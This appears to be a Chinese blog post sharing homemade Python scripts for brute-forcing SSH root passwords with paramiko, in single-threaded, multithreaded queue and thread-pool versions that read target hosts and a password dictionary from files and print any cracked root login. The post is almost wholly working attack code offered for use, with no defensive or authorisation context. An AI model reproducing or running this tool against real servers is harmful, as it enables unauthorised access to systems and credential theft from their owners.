前些天,基友发我一个ssh爆破工具,看起来很吊的样子。然后我就无聊自己写了个py脚本的。
单线程:慢成狗-----
#coding:utf-8
#author:jwong
import threading
import os
import time
import paramiko
import sys
import Queue
import socket
BASE_DIR = os.path.dirname(os.path.abspath(__file__))
def ssh_connect(host,pwd):
ssh = paramiko.SSHClient()
ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy())
try:
ssh.connect(hostname=host,port=22,username='root',password=pwd,timeout=5)
ssh.close()
print('破解成功!用户名:root' + '密码:' + pwd + ',ip:' + host)
except paramiko.AuthenticationException,e:
pass
except socket.error,e:
pass
# class ClassName(object):
# """docstring for ClassName"""
# def __init__(self, arg):
# super(ClassName, self).__init__()
# self.arg = arg
#
host_file = BASE_DIR + '\dict\hosts.txt'
pass_file = BASE_DIR + '\dict\pass.txt'
def open_file(path):
host = []
with open(path,'r') as f:
for line in f.readlines():
if line.strip('\n') == '':
continue
host.append(line.strip('\n'))
return host
hosts = open_file(host_file)
password = open_file(pass_file)
for host in hosts:
for pass12 in password:
print host
ssh_connect(host,pass12)
运行会出现:No handlers could be found for logger "paramiko.transport" 错误 ----http://stackoverflow.com/questions/19152578/no-handlers-could-be-found-for-logger-paramiko
多线程版本:
#coding:utf-8
import threading
import Queue
import paramiko
import socket
import os
BASE_DIR = os.path.dirname(os.path.abspath(__file__))
host_file = BASE_DIR + '\dict\hosts.txt'
pass_file = BASE_DIR + '\dict\pass.txt'
paramiko.util.log_to_file("filename.log")
queue = Queue.Queue()
lock = threading.Lock()
def read_host_file(path):
hostlist = []
with open(path,'r') as f:
for line in f.readlines():
if line == '':
continue
line = socket.gethostbyname(line.strip())
hostlist.append(line)
return hostlist
def read_pass_file(path):
passlist = []
with open(path,'r') as f:
for line in f.readlines():
if line == '':
continue
passlist.append(line.strip())
return passlist
class SSH(threading.Thread):
"""docstring for SSH"""
def __init__(self,queue):
threading.Thread.__init__(self)
self.queue = queue
def run(self):
while True:
# if self.queue.empty():
# break
host,pwd = self.queue.get()
try:
ssh = paramiko.SSHClient()
ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy())
ssh.connect(hostname=host,port=22,username='root',password=pwd,timeout=5)
ssh.close()
print('破解成功!用户名:root' + '密码:' + pwd + ',ip:' + host)
except paramiko.AuthenticationException,e:
pass
except socket.error,e:
pass
except:
pass
self.queue.task_done()
if __name__ == '__main__':
hosts = read_host_file(host_file)
passlist = read_pass_file(pass_file)
for i in range(30):
fuck_ssh = SSH(queue)
fuck_ssh.setDaemon(True)
fuck_ssh.start()
for host in hosts:
for pwd in passlist:
queue.put((host,pwd))
queue.join()
另一个模块实现:
#coding:utf-8
from multiprocessing.dummy import Pool as ThreadPool
from functools import partial
if __name__ == '__main__':
hosts = read_host_file(host_file)
passlist = read_pass_file(pass_file)
for host in hosts:
partial_user = partial(ssh_connect,host)
pool = ThreadPool(20)
pool.map(partial_user,passlist)
pool.close()
pool.join()
参考文献:
http://www.ibm.com/developerworks/cn/aix/library/au-threadingpython/
http://www.waitalone.cn/python-mysql-mult.html
http://www.waitalone.cn/python-brute-all.html
http://www.waitalone.cn/python-thread-map.html